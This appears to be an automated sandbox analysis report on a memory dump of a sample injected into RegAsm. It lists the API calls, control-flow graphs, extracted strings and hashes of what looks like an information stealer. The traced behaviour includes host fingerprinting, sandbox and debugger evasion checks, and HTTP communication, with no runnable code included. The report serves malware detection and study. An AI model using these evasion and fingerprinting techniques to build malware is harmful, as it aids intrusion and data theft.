            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
            • API String ID: 2127927946-2218711628
            • Opcode ID: 62a93e331a1829f9f90dde32a5a87501dfa4acb2aa956d2fcd824e40e1e2fd2e
            • Instruction ID: 568009891a73934414478d5ea9ac1d95815f38c27f73e6007f327c9a8c174b1c
            • Opcode Fuzzy Hash: 62a93e331a1829f9f90dde32a5a87501dfa4acb2aa956d2fcd824e40e1e2fd2e
            • Instruction Fuzzy Hash: 1541AB79740624EBC71CAFE5EC89B997F71AB4C712BA0C062F90299190C7F9D5019B3E

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 859 4062d0-40635b call 41a170 call 404800 call 41a110 InternetOpenA 867 406364-406368 859->867 868 40635d 859->868 869 406559-406575 call 41a170 call 41a1d0 * 2 867->869 870 40636e-406392 InternetConnectA 867->870 868->867 885 406578-40657d 869->885 872 406398-40639c 870->872 873 40654f-406552 870->873 875 4063aa 872->875 876 40639e-4063a8 872->876 873->869 878 4063b4-4063e2 875->878 876->878 883 406545-406548 878->883 884 4063e8-4063ec 878->884 883->873 886 406415-406455 HttpSendRequestA 884->886 887 4063ee-40640e 884->887 889 406457-406477 call 41a110 call 41a1d0 * 2 886->889 890 40647c-40649b call 4183e0 886->890 887->886 889->885 895 406519-406539 call 41a110 call 41a1d0 * 2 890->895 896 40649d-4064a4 890->896 895->885 899 4064a6-4064d0 InternetReadFile 896->899 900 406517-40653e 896->900 905 4064d2-4064d9 899->905 906 4064db 899->906 900->883 905->906 909 4064dd-406515 call 41a380 call 41a270 call 41a1d0 905->909 906->900 909->899
            APIs
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            • InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000,00420DE3), ref: 00406331
            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Internet$??2@$ConnectCrackFileHttpOpenReadRequestSend
            • String ID: ERROR$ERROR$GET
            • API String ID: 1522062773-2509457195
            • Opcode ID: 37c9a35f6efc1406ab06139e2c56cf7233533a6dde65a2729a3abd1b6f546bcc
            • Instruction ID: cbac5eee591d607aa173065357eefb87c001816e051c1cde1c99a9b9dc38779b
            • Opcode Fuzzy Hash: 37c9a35f6efc1406ab06139e2c56cf7233533a6dde65a2729a3abd1b6f546bcc
            • Instruction Fuzzy Hash: AA719F71A00218EBDB24DFA0DC49FEEB775AF44704F1080AAF50A6B1D0DBB86A85CF55
            APIs
            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: NameUser
            • String ID:
            • API String ID: 2645101109-0
            • Opcode ID: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
            • Instruction ID: d97db1a59c4db881a004fd13fa95f43a4b4e799dc382b7b3ddd968380e0460c3
            • Opcode Fuzzy Hash: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
            • Instruction Fuzzy Hash: B6F04FB1944648AFC710DF98DD45BAEBBB9FB08B21F10021AFA15A3690C7745545CBA1
            APIs
            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InfoSystem
            • String ID:
            • API String ID: 31276548-0
            • Opcode ID: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
            • Instruction ID: 6710e554edad90447a57410479f56be173a40300ace114c8cd68aa34356edfab
            • Opcode Fuzzy Hash: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
            • Instruction Fuzzy Hash: 17D05E74D0020CDBCB14DFE09A49ADDBB7AAB0D321F001656ED0572240DA305446CA65

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 725 4195e0-4195ea 726 4195f0-419a01 725->726 727 419a06-419a9a LoadLibraryA * 5 725->727 726->727 734 419b16-419b1d 727->734 735 419a9c-419b11 727->735 737 419b23-419be1 734->737 738 419be6-419bed 734->738 735->734 737->738 739 419c68-419c6f 738->739 740 419bef-419c63 738->740 742 419c75-419d02 739->742 743 419d07-419d0e 739->743 740->739 742->743 747 419d14-419dea 743->747 748 419def-419df6 743->748 747->748 750 419e72-419e79 748->750 751 419df8-419e6d 748->751 756 419e7b-419ea7 750->756 757 419eac-419eb3 750->757 751->750 756->757 760 419ee5-419eec 757->760 761 419eb5-419ee0 757->761 767 419fe2-419fe9 760->767 768 419ef2-419fdd 760->768 761->760 773 419feb-41a048 767->773 774 41a04d-41a054 767->774 768->767 773->774 779 41a056-41a069 774->779 780 41a06e-41a075 774->780 779->780 790 41a077-41a0d3 780->790 791 41a0d8-41a0d9 780->791 790->791
            APIs
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A0D
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A1E
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A42
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A77
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A88
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: HttpQueryInfoA$InternetSetOptionA
            • API String ID: 1029625771-1775429166
            • Opcode ID: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
            • Instruction ID: de404ee9f47513f53d28e8016dc56f999ad60f1515a6c9981bc8237813ea7153
            • Opcode Fuzzy Hash: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
            • Instruction Fuzzy Hash: 946243B5500E00AFC774DFA8EE88D1E3BABBB8C761750A51AE609C3674D7349443DBA4

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 919 4048d0-404992 call 41a170 call 404800 call 41a110 * 5 936 404994 919->936 937 40499b-40499f 919->937 936->937 938 4049a5-404b1d call 418600 call 41a2f0 call 41a270 call 41a1d0 * 2 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a2f0 call 41a270 call 41a1d0 * 2 937->938 939 404f1b-404f43 call 41a4a0 call 409b10 937->939 938->939 1027 404b23-404b27 938->1027 952 404f82-404ff2 call 418430 * 2 call 41a170 call 41a1d0 * 8 939->952 953 404f45-404f7d call 41a1f0 call 41a380 call 41a270 call 41a1d0 939->953 953->952 1028 404b35 1027->1028 1029 404b29-404b33 1027->1029 1030 404b3f-404b72 1028->1030 1029->1030 1032 404b78-404e78 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a110 call 41a2f0 * 2 call 41a270 call 41a1d0 * 2 call 41a4a0 * 4 1030->1032 1033 404f0e-404f14 1030->1033 1147 404e82-404eac 1032->1147 1033->939 1149 404eb7-404f09 InternetCloseHandle call 41a1d0 1147->1149 1150 404eae-404eb5 1147->1150 1149->1033 1150->1149 1151 404eb9-404ef7 call 41a380 call 41a270 call 41a1d0 1150->1151 1151->1147
            APIs
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            • InternetCloseHandle.WININET(00000000), ref: 00404EFD
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ??2@$Internet$CloseCrackHandle
            • String ID: "$"$------$------$------
            • API String ID: 3842476067-2180234286
            • Opcode ID: 708755aed416520086e08f34001f7f397d5272e2906fc1d4a52a7c1cce2566f0
            • Instruction ID: 96828d9d4da3c69e3e13a7d192eb2c0d5cb14303612463eff3b0a86b38ab5adb
            • Opcode Fuzzy Hash: 708755aed416520086e08f34001f7f397d5272e2906fc1d4a52a7c1cce2566f0
            • Instruction Fuzzy Hash: 7B124E71912118AACB14EB91DC96FEEB339AF14314F50419EF50662091EF782F98CF6A

            Control-flow Graph

            APIs
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ??2@$CrackInternet
            • String ID: <
            • API String ID: 676793843-4251816714
            • Opcode ID: 2f4ab3673443420506f52f30828b11760ea29e85b2ca068c11f228e25f55c4dd
            • Instruction ID: 93cf72731df314aae8b190796811ac6c8ed605cccc68025416595ba5c6ffb16c
            • Opcode Fuzzy Hash: 2f4ab3673443420506f52f30828b11760ea29e85b2ca068c11f228e25f55c4dd
            • Instruction Fuzzy Hash: 0A2129B1D00208ABDF14DFA5E849ADD7B75FF44364F108229F926A72D0DB706A05CF95

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1388 4112b0-4112dd call 41a4a0 1392 4112e7-411301 call 41a4a0 strtok_s 1388->1392 1393 4112df-4112e1 ExitProcess 1388->1393 1396 411304-411308 1392->1396 1397 4114d2-4114dd call 41a1d0 1396->1397 1398 41130e-411321 1396->1398 1400 411327-41132a 1398->1400 1401 4114ae-4114cd strtok_s 1398->1401 1403 411401-411412 1400->1403 1404 411461-411472 1400->1404 1405 411480-411491 1400->1405 1406 411423-411434 1400->1406 1407 411442-411453 1400->1407 1408 411345-411354 call 41a1f0 1400->1408 1409 41136d-41137e 1400->1409 1410 41138f-4113a0 1400->1410 1411 411331-411340 call 41a1f0 1400->1411 1412 411359-411368 call 41a1f0 1400->1412 1413 4113bd-4113ce 1400->1413 1414 4113df-4113f0 1400->1414 1415 41149f-4114a9 call 41a1f0 1400->1415 1401->1396 1434 411414-411417 1403->1434 1435 41141e 1403->1435 1442 411474-411477 1404->1442 1443 41147e 1404->1443 1446 411493-411496 1405->1446 1447 41149d 1405->1447 1436 411440 1406->1436 1437 411436-411439 1406->1437 1438 411455-411458 1407->1438 1439 41145f 1407->1439 1408->1401 1440 411380-411383 1409->1440 1441 41138a 1409->1441 1444 4113a2-4113ac 1410->1444 1445 4113ae-4113b1 1410->1445 1411->1401 1412->1401 1448 4113d0-4113d3 1413->1448 1449 4113da 1413->1449 1432 4113f2-4113f5 1414->1432 1433 4113fc 1414->1433 1415->1401 1432->1433 1433->1401 1434->1435 1435->1401 1436->1401 1437->1436 1438->1439 1439->1401 1440->1441 1441->1401 1442->1443 1443->1401 1450 4113b8 1444->1450 1445->1450 1446->1447 1447->1401 1448->1449 1449->1401 1450->1401
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strtok_s$ExitProcess
            • String ID: block
            • API String ID: 762877946-2199623458
            • Opcode ID: 1ba1f058e3e2379031d11e79f6d2bdd312730fa939e98f1981bd39696260f1a4
            • Instruction ID: b2aee4bd772402993bd8daf8ed4e127407cef198cc172b88b11a84757ccddcb3
            • Opcode Fuzzy Hash: 1ba1f058e3e2379031d11e79f6d2bdd312730fa939e98f1981bd39696260f1a4
            • Instruction Fuzzy Hash: 6451A574B00209EFDB14DFA0E944BEE37B5BF44B04F10804AE916A7361D778D996CB5A

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1451 416fa0-416fea 1453 416ff3-417067 GetVolumeInformationA call 4187a0 * 3 1451->1453 1454 416fec 1451->1454 1461 417078-41707f 1453->1461 1454->1453 1462 417081-41709a call 4187a0 1461->1462 1463 41709c-4170b7 1461->1463 1462->1461 1469 4170b9-4170c6 call 41a110 1463->1469 1470 4170c8-4170f8 call 41a110 1463->1470 1474 41711e-41712e 1469->1474 1470->1474
            APIs
            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041701F
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InformationVolume
            • String ID: :$C$\
            • API String ID: 2039140958-3809124531
            • Opcode ID: b8d4498c9ef52ac0e7ff8a74a815c8f3508d9b1454889a6f46a668afd64d8a13
            • Instruction ID: 54c0e4e4c236f1d7f0585d8ba6b1fa909b8b3bfc40374ef6a46e6daa0de72561
            • Opcode Fuzzy Hash: b8d4498c9ef52ac0e7ff8a74a815c8f3508d9b1454889a6f46a668afd64d8a13
            • Instruction Fuzzy Hash: 1341B1B1D04248EBDB20DFA4CC45BEEBBB8AF08714F14009DF50967281D7786A84CBA9

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1477 401220-401247 call 418450 GlobalMemoryStatusEx 1480 401273-40127a 1477->1480 1481 401249-401271 call 41d3f0 * 2 1477->1481 1483 401281-401285 1480->1483 1481->1483 1485 401287 1483->1485 1486 40129a-40129d 1483->1486 1487 401292 1485->1487 1488 401289-401290 1485->1488 1487->1486 1488->1486 1488->1487
            APIs
            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
            • __aulldiv.LIBCMT ref: 00401258
            • __aulldiv.LIBCMT ref: 00401266
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __aulldiv$GlobalMemoryStatus
            • String ID: @
            • API String ID: 2185283323-2766056989
            • Opcode ID: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
            • Instruction ID: 3a295e2926d3a661784167dae5cc93d3585e5da9a2cb48fc087cd8b2851d2611
            • Opcode Fuzzy Hash: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
            • Instruction Fuzzy Hash: 8601FBB0D40308BAEB10EBE4DD49B9EBB78AB14705F20809EEA05B62D0D7785585875D

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1491 419270-419284 call 419160 1494 4194a3-419502 LoadLibraryA * 2 1491->1494 1495 41928a-41949e call 419190 1491->1495 1503 419504-419518 1494->1503 1504 41951d-419524 1494->1504 1495->1494 1503->1504 1505 419556-41955d 1504->1505 1506 419526-419551 1504->1506 1509 419578-41957f 1505->1509 1510 41955f-419573 1505->1510 1506->1505 1513 419581-419594 1509->1513 1514 419599-4195a0 1509->1514 1510->1509 1513->1514 1515 4195d1-4195d2 1514->1515 1516 4195a2-4195cc 1514->1516 1516->1515
            APIs
            • LoadLibraryA.KERNEL32(?,?,004164A0), ref: 004194AA
            • LoadLibraryA.KERNEL32(?,?,004164A0), ref: 004194DF
            Strings
            • NtQueryInformationProcess, xrefs: 004195BA
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: NtQueryInformationProcess
            • API String ID: 1029625771-2781105232
            • Opcode ID: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
            • Instruction ID: 826a308167d33dd6e89c68d84aa8ae535e40b86c028b310e96c4c1ecb1cfdbe7
            • Opcode Fuzzy Hash: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
            • Instruction Fuzzy Hash: D3A171B5500A00EFC764DF68ED88E1E3BBBBB4C361B50A51AEA05C3674D7349843DBA5

            Control-flow Graph

            APIs
              • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
              • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
              • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
            • GetUserDefaultLCID.KERNEL32 ref: 004164C6
              • Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F
              • Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: NameUser__aulldiv$AllocComputerDefaultGlobalInfoMemoryNumaStatusSystemVirtual
            • String ID:
            • API String ID: 3178950686-0
            • Opcode ID: 097da323ac4eb8756f48a57aff9b622020cd776e5523750053ba436d79081546
            • Instruction ID: c6285a65dcb1a135c62ded655b7a731d229dd5b525af539dc0d6bcccc6ed86c8
            • Opcode Fuzzy Hash: 097da323ac4eb8756f48a57aff9b622020cd776e5523750053ba436d79081546
            • Instruction Fuzzy Hash: B0319230941108BACB04FBF1DC56BEE7339AF14318F10452EF91366092DFBC6985C66A
            APIs
            • GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ComputerName
            • String ID:
            • API String ID: 3545744682-0
            • Opcode ID: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
            • Instruction ID: 42712b1d228129e2e67f3f866f9c43061177fb5da2658b34d54d74d13c44c576
            • Opcode Fuzzy Hash: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
            • Instruction Fuzzy Hash: BC0181B1A08608EBC710CF99DD45BEEBBB8FB04721F20021AF905E3690D7785945CBA5
            APIs
            • VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocNumaVirtual
            • String ID:
            • API String ID: 4233825816-0
            • Opcode ID: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
            • Instruction ID: 0e2e6d3d2f445679f77a7861b9af8e0e8f55b174cdb9f0aa425208459b8dc1b3
            • Opcode Fuzzy Hash: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
            • Instruction Fuzzy Hash: 3DE08670945308FBE7205FA09C0AB4D76689B04B05F105056F708BA1E0C6B82501865C
            APIs
            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,004164BC), ref: 004010B3
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
            • Instruction ID: f48f966fb8dbc32d8d9482a6eca9c47ea769ab036d71d5fa6551aa32425d7b68
            • Opcode Fuzzy Hash: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
            • Instruction Fuzzy Hash: 62F02771641218BBE7149BA4AD49FAFB7DCE705B08F304459F940E3390D5719F00DA64
            APIs
            • IsDebuggerPresent.KERNEL32 ref: 0041B562
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041B577
            • UnhandledExceptionFilter.KERNEL32(0041F298), ref: 0041B582
            • GetCurrentProcess.KERNEL32(C0000409), ref: 0041B59E
            • TerminateProcess.KERNEL32(00000000), ref: 0041B5A5
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
            • String ID:
            • API String ID: 2579439406-0
            • Opcode ID: f83f28cb76d01a588ba20aedf737648f300cf2348463cefc92e4954df8d9d801
            • Instruction ID: e298f46f0b3396334d2e2e37c4a67069ca1d3d313a6b9180192500d6cd60c5fb
            • Opcode Fuzzy Hash: f83f28cb76d01a588ba20aedf737648f300cf2348463cefc92e4954df8d9d801
            • Instruction Fuzzy Hash: 2F21D678600214DFD720EF59F9D4AA97BB5FB08314F90803AE809D7261E7B46586CF9D
            APIs
